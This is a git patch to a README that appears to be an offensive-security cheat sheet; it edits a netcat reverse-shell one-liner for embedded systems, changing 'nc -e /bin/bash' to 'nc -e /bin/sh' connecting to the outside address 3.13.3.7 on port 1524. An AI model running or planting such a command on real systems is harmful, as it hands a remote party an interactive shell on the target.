From c72140ec7608f69c40052412caa504fc7f5a2f64 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:19:31 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 515af05..288b537 100644 --- a/README.md +++ b/README.md @@ -1135,7 +1135,7 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work On the remote system: ```sh -nc -e /bin/bash -vn 3.13.3.7 1524 +nc -e /bin/sh -vn 3.13.3.7 1524 ``` Variant if *'-e'* is not supported: